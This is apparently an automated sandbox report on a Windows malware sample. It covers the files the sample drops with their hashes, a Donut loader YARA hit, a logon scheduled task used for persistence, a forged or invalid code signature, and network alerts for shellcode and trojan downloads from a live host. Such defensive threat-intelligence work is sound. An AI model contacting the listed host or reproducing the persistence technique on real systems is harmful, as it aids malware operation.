                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):40917
                                                            Entropy (8bit):7.28053200206121
                                                            Encrypted:false
                                                            SSDEEP:768:3SR/d8civCTlNQHE64vMXuyMcS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:Q/dSCoHE6wE7McS7i9u6yeNejY6yFOB
                                                            MD5:8AA72F47438EEBD6FE0E8C94BD206CA8
                                                            SHA1:6B9AD499F5C9E71294E3086A8C6E56F3B5C4590F
                                                            SHA-256:E45B9DFCCD0EEE7F4D676E2AAA74D8FE0238A3B37E2B21A9182C283B70D6A2FD
                                                            SHA-512:A5315D541B118D72997204FA983EBB0046F8B8D09EABEDFC1C1BCC55200B5191611697F2B9BE9B065656FDBC7BE6CE2BC0328BD03BDCD45A7A11384D1B199400
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].bin, Author: unknown
                                                            Preview:..=...=..`9j.k...5pD?.Q....".f 7.h.........}]'..4.NV.h3.t>.Qro.......B.'".i...x.8..RX.K7...f.m4...+.9W!.F.....6...f..l6...Q.fQ..=.F%y..=..H..c.}..x}.....:.E"."....h........~(.k...>B..ns.D.......C.....q...>+CQ0....V.s.....u.}..&I.*8_.!.>..=(.;.....S.*........U....._SO...||_..I..X..R..bD...[..Sz.7...F..u_.....Q.....@...(.-G......}...E...m.l....EL.....)WI.....I/=u3N^WY...#.YH...\j.5{.s.9z7=A..A.Y;...5Yq,.ND\#.M..L....j...O..@-z..n..b._.........u.....ns.KL.h<._..x...D.,....6....}..P.5.-u.u&B#.. .G.|_....]T....}......g....Xl<.J...R~|.m......................N.z..x.+.-}.[;...L;.....].2..*.....4..0...(../.b.C...M=....b{t7........Wp..E...J.~.K...8....g.:[]..{4......V.F.....*y^...M.SI.....i..w..4.<*.Z..$:t8.DJj.+........P.*...w.^@#....X.P.*....H...]...~I.5F...=dA....~kU.Y.X.V+.......m*.)7*.......]i...G.f....=...`......=........R.x.-`.Mbe...M..J..#..Y......Q../H....5...!`.....p?b.... B..../|...fL..q.....V.t....u..P...{...;.&u.p.;..._..1.......T..ru..U.
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):91104
                                                            Entropy (8bit):6.919609919273454
                                                            Encrypted:false
                                                            SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                            MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                            SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                            SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                            SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):455160
                                                            Entropy (8bit):6.695463462044302
                                                            Encrypted:false
                                                            SSDEEP:12288:aZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77m:a/8wVwHZFTwFOOos3Ooc8DHkC2e77m
                                                            MD5:50260B0F19AAA7E37C4082FECEF8FF41
                                                            SHA1:CE672489B29BAA7119881497ED5044B21AD8FE30
                                                            SHA-256:891603D569FC6F1AFED7C7D935B0A3C7363C35A0EB4A76C9E57EF083955BC2C9
                                                            SHA-512:6F99D39BFE9D4126417FF65571C78C279D75FC9547EE767A594620C0C6F45F4BB42FD0C5173D9BC91A68A0636205A637D5D1C7847BD5F8CE57E120D210B0C57D
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0......................................5.....@..........................W..L...<...<........................=.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):970744
                                                            Entropy (8bit):6.964896388792595
                                                            Encrypted:false
                                                            SSDEEP:12288:6BmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJSH:SmFyjLF847eiWWcoGZVOIxh/WxIAIbu
                                                            MD5:50097EC217CE0EBB9B4CAA09CD2CD73A
                                                            SHA1:8CD3018C4170072464FBCD7CBA563DF1FC2B884C
                                                            SHA-256:2A2FF2C61977079205C503E0BCFB96BF7AA4D5C9A0D1B1B62D3A49A9AA988112
                                                            SHA-512:AC2D02E9BFC2BE4C3CB1C2FFF41A2DAFCB7CE1123998BBF3EB5B4DC6410C308F506451DE9564F7F28EB684D8119FB6AFE459AB87237DF7956F4256892BBAB058
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D.....................................................@.........................`........R..(....p...................=......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):219584
                                                            Entropy (8bit):6.1663383385555814
                                                            Encrypted:false
                                                            SSDEEP:3072:0Kip9MQPBN+xPYpaEjlFORHc+hmTb2vNESkT6rQxCqCp4fCw4mCD4pbu:0D5N+6fjlURHcTbMNSTbxupfwADL
                                                            MD5:E864FE41A4FEDEC386A65CB456CA3066
                                                            SHA1:3BEE65E903573E7CDB0592F3519F98BDCDE493C3
                                                            SHA-256:06871B2A233E56C57741FD40EC1D298D306C60FCBF5236832C4CE98FF34D8DCA
                                                            SHA-512:4E8C0EB8F2642BA210C53C5CF4379D2F89A1130B148C934B79ACD32B2B77257A18C24173AEF36877C64C46E709EB4A622CF69A352DCEBE97ACCB432F5D886317
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........L...L...L...E...F....$..\....$..F....$..N....$..H......I...L...*....'..M....'..M....'b.M....'..M...RichL...........PE..L...>..e...........!...'............3........................................p............@.........................P.......l........................0...).......a.....................................@............................................text............................... ..`.rdata...2.......4..................@..@.data...............................@....rsrc...............................@..@.reloc...a.......b..................@..B................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):349
                                                            Entropy (8bit):2.4642354644001863
                                                            Encrypted:false
                                                            SSDEEP:3:OxA6x/MF+AtnoUa/Z/aEjCCNFqP1SXsIISXSII/6JFFTCQor/rZ:Od/4+ARo7/hX0qIGICLhojF
                                                            MD5:FE8FE166EC4836ACD97EEF02211F6612
                                                            SHA1:D967948AC32F993C2C8F877F1E455ABEE2CE08A0
                                                            SHA-256:FCA89EB419B97B702109F2863667306FE085BAB9F31F2D4B77E48A26CACC4E9F
                                                            SHA-512:2A76B10D66D6227B68320AC57432D15A82FEC89520AF7FDE60C458F745880777007008A7538539F790005AE2970CBF381A8CCEAE93E602E4C73DEDAD48ADF872
                                                            Malicious:false
                                                            Preview:Not Windows 7. Continuing with the rest of the code.......TaskPath TaskName State ..-------- -------- ----- ..\ OnLogon Ready ..........ok..
                                                            File type:PE32 executable (console) Intel 80386, for MS Windows
                                                            Entropy (8bit):6.497862673770642
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:LisectAVT_2403002B_185.exe
                                                            File size:328'552 bytes
                                                            MD5:0aafd40537a281b281bd85efcb2c976b
                                                            SHA1:d9b7aa59133586c9f885899b0483117500460036
                                                            SHA256:89daf7a9b800a5d38cf93accc70b5f24568aa65353e2c1b44199159a8cf888fb
                                                            SHA512:91ff154a67a4462982581e1191f91d0ac10a47b93d339f7f152bb8f97a7eec3f84e97b9a46484fa1165ffa9f9f12200ca11fb4cc814d4ad5743618a15e37ce85
                                                            SSDEEP:6144:zqgHVf5iIZrJCt6nn01HZLj0DubeeBKjMvtwAOMX2HgzxdQacEdY:zpVBX9JCtJB9w5acH
                                                            TLSH:45645B0175418432E7660B3149E9EAF9492DAD740B94A8DFE3E83E7E4E712D36A3311F
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N..^............A.......A.......A.......X.......X.......X...F...A...........f.....................|.............Rich...........
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x409ffb
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows cui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x65FC8D9A [Thu Mar 21 19:42:18 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:0551946c53eef862268f699870a0319b
                                                            Signature Valid:false
                                                            Signature Issuer:CN=GlobalSign CodeSigning CA - G3, O=GlobalSign nv-sa, C=BE
                                                            Signature Validation Error:The digital signature of the object did not verify
                                                            Error Number:-2146869232
                                                            Not Before, Not After
                                                            • 18/02/2020 22:11:49 18/02/2023 04:42:26
                                                            Subject Chain
                                                            • CN="BEIJING KUWO TECHNOLOGY CO.,LTD.", O="BEIJING KUWO TECHNOLOGY CO.,LTD.", L=Beijing, S=Beijing, C=CN
                                                            Version:3
                                                            Thumbprint MD5:A8E70CC9BA3E5602D7C4F6BC5A516542
                                                            Thumbprint SHA-1:B4BC05741C5F8EF6AC8863D2A737B5444DB63ED8
                                                            Thumbprint SHA-256:9214C7372F243EC5071BA66562243A8845CB3FD2F647BF39B81BD7BB419DB915
                                                            Serial:60CEB993776A1B86387AE3F0
                                                            Instruction
                                                            call 00007FE790E4D889h
                                                            jmp 00007FE790E4D2A9h
                                                            push ebp
                                                            mov ebp, esp
                                                            mov eax, dword ptr [ebp+08h]
                                                            push esi
                                                            mov ecx, dword ptr [eax+3Ch]
                                                            add ecx, eax
                                                            movzx eax, word ptr [ecx+14h]
                                                            lea edx, dword ptr [ecx+18h]
                                                            add edx, eax
                                                            movzx eax, word ptr [ecx+06h]
                                                            imul esi, eax, 28h
                                                            add esi, edx
                                                            cmp edx, esi
                                                            je 00007FE790E4D44Bh
                                                            mov ecx, dword ptr [ebp+0Ch]
                                                            cmp ecx, dword ptr [edx+0Ch]
                                                            jc 00007FE790E4D43Ch
                                                            mov eax, dword ptr [edx+08h]
                                                            add eax, dword ptr [edx+0Ch]
                                                            cmp ecx, eax
                                                            jc 00007FE790E4D43Eh
                                                            add edx, 28h
                                                            cmp edx, esi
                                                            jne 00007FE790E4D41Ch
                                                            xor eax, eax
                                                            pop esi
                                                            pop ebp
                                                            ret
                                                            mov eax, edx
                                                            jmp 00007FE790E4D42Bh
                                                            push esi
                                                            call 00007FE790E4DD3Ch
                                                            test eax, eax
                                                            je 00007FE790E4D452h
                                                            mov eax, dword ptr fs:[00000018h]
                                                            mov esi, 00439230h
                                                            mov edx, dword ptr [eax+04h]
                                                            jmp 00007FE790E4D436h
                                                            cmp edx, eax
                                                            je 00007FE790E4D442h
                                                            xor eax, eax
                                                            mov ecx, edx
                                                            lock cmpxchg dword ptr [esi], ecx
                                                            test eax, eax
                                                            jne 00007FE790E4D422h
                                                            xor al, al
                                                            pop esi
                                                            ret
                                                            mov al, 01h
                                                            pop esi
                                                            ret
                                                            push ebp
                                                            mov ebp, esp
                                                            cmp dword ptr [ebp+08h], 00000000h
                                                            jne 00007FE790E4D439h
                                                            mov byte ptr [00439234h], 00000001h
                                                            call 00007FE790E4DB2Ah
                                                            call 00007FE790E4FD4Eh
                                                            test al, al
                                                            jne 00007FE790E4D436h
                                                            xor al, al
                                                            pop ebp
                                                            ret
                                                            call 00007FE790E589C5h
                                                            test al, al
                                                            jne 00007FE790E4D43Ch
                                                            push 00000000h
                                                            call 00007FE790E4FD55h
                                                            pop ecx
                                                            jmp 00007FE790E4D41Bh
                                                            mov al, 01h
                                                            pop ebp
                                                            ret
                                                            push ebp
                                                            mov ebp, esp
                                                            cmp byte ptr [00439235h], 00000000h
                                                            je 00007FE790E4D436h
                                                            mov al, 01h
                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x36fa00x64.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x139c0.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x4d2000x3168
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000x1d78.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x34b1c0x38.rdata
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34b580x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x290000x190.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x27b480x27c00f9369b3de80dc2c86a013e9c45987826False0.5549270341981132data6.5674932450931145IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x290000xe8b60xea00d8cb14d23420e608b6e529be084f5c2fFalse0.5098490918803419OpenPGP Secret Key Version 35.550865699729164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x380000x1d6c0x10007189b1f5fdb48443940180984db65284False0.1962890625DOS executable (block device driver)3.171188272220345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x3a0000x139c00x13a0061637e6f774bdd5046dba2a5bfd1ffc0False0.28734574044585987data5.572749455643106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc0x4e0000x1d780x1e0034c18553d7f180cce18f79b006cd2e7bFalse0.7430989583333333data6.4748070259396195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            EXE0x3a0f00x13368PE32 executable (GUI) Intel 80386, for MS WindowsChineseChina0.28584680288705905
                                                            RT_VERSION0x4d4580x3e0dataChineseChina0.4586693548387097
                                                            RT_MANIFEST0x4d8380x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                            DLLImport
                                                            KERNEL32.dllSetPriorityClass, VirtualFree, GetCurrentProcess, VirtualAlloc, SetThreadPriority, Sleep, GetCurrentThread, GetVersionExA, ExitProcess, GetConsoleWindow, CreateDirectoryA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, WideCharToMultiByte, LCMapStringEx, GetStringTypeW, GetCPInfo, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, TerminateProcess, RtlUnwind, RaiseException, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetCommandLineA, GetCommandLineW, GetStdHandle, WriteFile, GetModuleFileNameW, GetModuleHandleExW, GetFileSizeEx, SetFilePointerEx, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ReadFile, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, SetEndOfFile
                                                            USER32.dllShowWindow
                                                            SHELL32.dllSHChangeNotify, ShellExecuteA
                                                            WININET.dllInternetCloseHandle, InternetOpenA, InternetReadFile, InternetOpenUrlA
                                                            Language of compilation systemCountry where language is spokenMap
                                                            ChineseChina
                                                            EnglishUnited States
                                                            TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                            2024-07-25T17:09:35.079831+0200TCP2011803ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected4434971582.156.94.48192.168.2.5
                                                            2024-07-25T17:09:27.110663+0200TCP2018581ET MALWARE Single char EXE direct download likely trojan (multiple families)49714443192.168.2.582.156.94.48
                                                            2024-07-25T17:10:08.423363+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4436161052.165.165.26192.168.2.5
                                                            2024-07-25T17:09:39.774044+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434971652.165.165.26192.168.2.5
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 25, 2024 17:09:24.803268909 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:24.803318977 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:24.803399086 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:24.813271046 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:24.813287020 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:26.416699886 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:26.416783094 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:26.417867899 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:26.417938948 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:26.472377062 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:26.472409010 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:26.472722054 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:26.472798109 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:26.475331068 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:26.516501904 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:27.110692024 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:27.110784054 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:27.110889912 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:27.110908031 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:27.115653992 CEST49714443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:27.115674019 CEST4434971482.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:27.139837980 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:27.139944077 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:27.140048981 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:27.140280962 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:27.140316963 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:28.775633097 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:28.775770903 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:28.776518106 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:28.776546955 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:28.776701927 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:28.776715994 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:29.647504091 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:29.647530079 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:29.647597075 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:29.647680998 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:29.647728920 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:29.647753954 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:30.209973097 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:30.209992886 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:30.210078001 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:30.210129976 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:30.210187912 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:30.839416027 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:30.839428902 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:30.839514971 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:30.839585066 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:30.839654922 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:31.154601097 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:31.154619932 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:31.154884100 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:31.154927969 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:31.155029058 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:31.470752954 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:31.470763922 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:31.470896959 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:31.470932007 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:31.471014977 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:32.094645023 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:32.094665051 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:32.094808102 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:32.094845057 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:32.094923019 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:32.404521942 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:32.404540062 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:32.404654980 CEST49715443192.168.2.582.156.94.48
                                                            Jul 25, 2024 17:09:32.404690981 CEST4434971582.156.94.48192.168.2.5
                                                            Jul 25, 2024 17:09:32.404763937 CEST49715443192.168.2.582.156.94.48
